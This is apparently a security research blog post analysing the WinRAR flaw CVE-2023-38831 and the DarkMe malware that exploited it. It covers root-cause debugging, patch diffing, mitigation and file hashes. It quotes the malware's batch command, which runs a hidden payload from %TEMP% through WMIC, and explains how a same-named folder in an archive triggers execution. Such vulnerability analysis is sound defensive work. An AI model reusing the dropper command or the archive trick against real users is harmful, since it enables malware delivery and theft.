CVE: CVE-2023-38831: A New WinRar Vulnerabilty
A remote code execution when the user attempts to view a benign file within a ZIP archive. The issue occurs because a) ZIP archive may include a benign file such as an ordinary .JPG file and also a folder that has the same name as the benign file, and the contents of the folder which may include executable content are processed during an attempt to access only the benign file.
Vulnerable Product Version: 6.22 =>
DarkMe Malware Exploits Critical WinRAR Vulnerability
CVE-2023-38831 has emerged as a highly critical vulnerability in the current year. Its significance lies in the fact that it was discovered in WinRAR, a widely used software application, and was subsequently exploited by the Evilnum Advanced Persistent Threat-APT group. This exploitation allowed the DarkMe Malware to carry out a series of malicious activities aimed at stealing sensitive information and causing financial harm to various companies.
DarkMe’s modus operandi primarily involves the deployment of spear-phishing emails, which are specifically tailored to target European countries, particularly online forums related to trading and stocks. The ultimate goal of these attacks is to pilfer financial assets and transaction data from unsuspecting victims.
The following section will provide an overview of DarkMe as a malware entity, shedding light on its broader operational aspects.”
Quick Overview of DarkMe Malware
There is more than one version of this malware, but the version discovered by Group-IB was delivered by a crafted archive file which is the CVE in this analysis, and this malware was targeting forms interested in trading to download a RAR file as a strategy.
Once the file is downloaded and try looking at the file structure, you will able to find the below files and folder.
The structure comprises two components: a folder named Screenshot_050723.jpg containing files with the same name, Screenshot_050723.jpg, and Trading_strategies_2023.pdf. Additionally, within the folder is a file named Screenshot_050723.jpg.cmd and a large-sized file titled weakicons.com.
Open the file Secreenshot_050723.jpg .cmd. in any text editor, and you will find the below suspicious command in the file.
This command opens a minimized Command Prompt window, navigates to the system’s temporary directory, searches for files named weakicons.com within all subdirectories, and endeavors to run each discovered file as an independent process using WMIC. After processing all the matching files, it terminates the Command Prompt window.
start /min cmd.exe /k “cd %TEMP% && for /R %TEMP% %%G in weakicons.com do WMIC process call create ‘%%G’ & exit”
The provided command is a Windows batch command designed to carry out a series of actions within a Command Prompt window.
It begins by using the start command to open a new Command Prompt window, instructing it to start minimized and remain open after execution. Within this new window, several commands are executed.
First, the cd %TEMP% command changes the current directory to the system’s temporary directory, typically stored in the %TEMP% environment variable. This ensures that subsequent operations take place at this temporary location.
The for loop, a control structure in batch scripting, is used to search for files named weakicons.com throughout all subdirectories beneath the temporary directory. The dir /b /s “weakicons.com” portion of the loop employs the dir command with the /b option to list only the file names and the /s option to search recursively in subdirectories. The loop iterates through the list of matching files, and for each file found, it attempts to create a new process using the WMIC with the WMIC process call create “%%~G” command. This effectively tries to execute each found file as a separate process.
The & symbol serves as a command separator, allowing multiple commands to execute sequentially on a single line. In this case, it’s used to join the WMIC command and the exit command, which closes the Command Prompt window once all the file processing is complete.
Execution Flow Of the Darkme Malware:
The scc.exe process is responsible for loading two Windows ActiveX files, namely n1.ocx and n2.ocx.)
These ActiveX files serve various purposes, including functioning as dynamic linkers or components within embedded systems.
Furthermore, they are useful in creating registry key parameters, which play a crucial role in establishing persistence and storing data required for executing the second stage of the operation.
Subsequently, the rundll32.exe utility is employed to establish a connection to a C2 server, facilitating the download and deployment of the DarkMe Trojan malware.
Proof Of Concept
The malware zip file was too large for debugging purposes, so I created a PoC using this script.
This approach simplifies and enhances the clarity of debugging, utilizing the exploit available at this location.
Once the file is successfully created using the above Python exploit, you can execute the exploit as shown in the below video.
Root Cause Of CVE: CVE-2023-38831 WinRar Vulnerability
We began debugging the application while triggering the exploit to pinpoint the root cause. During this process, I discovered that after double-clicking on the ReadMe.txt file, a function named winrar.7FF6CE909948 was invoked. This function performs a comparison of names between files and accepts three parameters: clicked_file_name, the_another_file, flag, and the flag, which is r8 in the below picture:
The decompiled code of winrar.7FF6CE909948 function was as shown below:
While taking a look at the comparing function, we will realize that the vulnerability’s root cause is because the r8 flag was set to 6, which means the code will perform a comparison of the two file names using the winrar.7FF6CE909948 function using the part number 2 in the above picture, i.e. , the else condition with the file names “ReadMe.txt “ and “ReadMe.txt //ReadMe.txt .cmd” Since the function doesn’t compare the entire name, it returns true because it compares file with the directory name and does not include the file inside this directory. For example, if we have two files named “HackThePlanet.txt“ and HackThePlanet.txt /hack.txt.cmd, the function will return true and add the file in the temp folder to extract & execute. In our case, we want to pass it to ShellExecuteW, which we will go through later
Then, WinRAR will create a file by calling the winrar.7FF77F736730 function. the first part of this function is checking if the file name has a space at the end or not
Subsequently, it invokes the winrar.7FF77F736730 function to obtain the final character in the loaded file’s path. It then verifies whether this character corresponds to 0x2E . or 0x20 space, and if it does, the function removes them.
It invokes the CreateFile function and provides the clicked file as a parameter, saving it into the temporary directory after eliminating any spaces in the file name.
Following that, it once more invokes the CreateFile function, this time passing the second file, which is the malicious one containing the script file named ReadMe.txt .cmd as shown in the below image.
As we can see, there are two files in the temporary directory: the first file is ReadMe.txt without a space at the end of this file, and the second one is ReadMe.txt .cmd, which has a space before the cmd extension. Windows considers the last part of the file as the current or actual extension.
Subsequently, it initiates the ShellExecuteExW function, a Windows API function responsible for executing files based on their extensions. It provides the file path, including the space “ReadMe.txt “, which is not located in the temp file as is. Consequently, the function conducts a directory search for any file name that matches this particular name.
In this instance, it locates the script file and proceeds to execute it, resulting in the demonstration of the calculator opening as part of the PoC section executing “ReadMe.txt .cmd”
Patch diffing
Before the patch
While performing patch diffing between the vulnerable and patched versions, the discrepancy between these functions was identified in the flag that determines comparison behavior 1 and 2. This particular issue has been resolved in the patched version by setting this flag before creating the temp file to ensure that multiple files are not loaded, as below in the BinDiff:
To summarize this analysis, when a user clicks on the WinRAR file, it calls a Compre_string function to compare the file name and the directory name with a character length.
If it matches the file and the directory, WinRAR will extract and execute the directory files, which include “ReadMe.txt .cmd” files. It also attempts to handle the space at the end of the file name and remove it, which also includes the space at the end of the extension in the “ReadMe.txt” file. WinRAR then creates a temporary directory without the space at the end and dots that are at the end of the “ReadMe.txt” file and leaves the “ReadMe.txt .cmd” file because the space is not at the end of this file. Then, the application passes the files to ShellExecuteW. It passes the clicked file with the space, which has already been removed in the temp directory. So, ShellExecuteW finds the only file in the temp directory with a space , “ReadMe.txt .cmd” and ShellExecuteW executes this file, causing the vulnerability.
After the patch
The application compares these files more than once to check the folder name and the files inside the folder again, using condition 1 as it is in the winrar.7FF6CE909948 decompiled the code of the function after using condition 2 as explained above. This will not result in a match, so the application will not extract or execute. As seen in the assembly instruction, it passes the value 2 argument to the r8 flag, and based on it, the comparing function will only extract and execute if it is not matched
How to Mitigate WinRAR Vulnerability: CVE-2023-3883
We recommend upgrading WinRAR to the most recent version following the application of security patch 6.23.
Detection
File hashes
c7f932111eb3adc6f6efe7a157209eb72c6bcd8ce172d5ce086feb5d01d73c80 fce580fbf2e151b5173d0c2e4548e5c436b10c8687e6700fa5192bd2aa9a9d41 fa019c79d5628880ae4df4b9a305099a875ce72cfb5ae023cfe9aec1efc278eb 6fa76fe51ddd6e70250f85dfded8165184bbcdf1ff4ad6a171265599154e8ec6
Final Thoughts
Throughout this analysis, identifying a singular indicator posed a challenge, contributing to the confusion shared by many researchers.
Initially, the focus was on the function responsible for removing spaces, which appeared to be the root cause.
However, upon conducting patch diffing, it became evident that the problem lay in how the application managed spaces within the file name before transferring it to ShellExecuteExW.
This discovery, while not immediately apparent, shed light on the issue. Understanding the intricate flow of this exploit took time, but it offered valuable insights into the realm of reverse engineering.
Credit for this research blog goes to Youssef Muhammad.
References
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/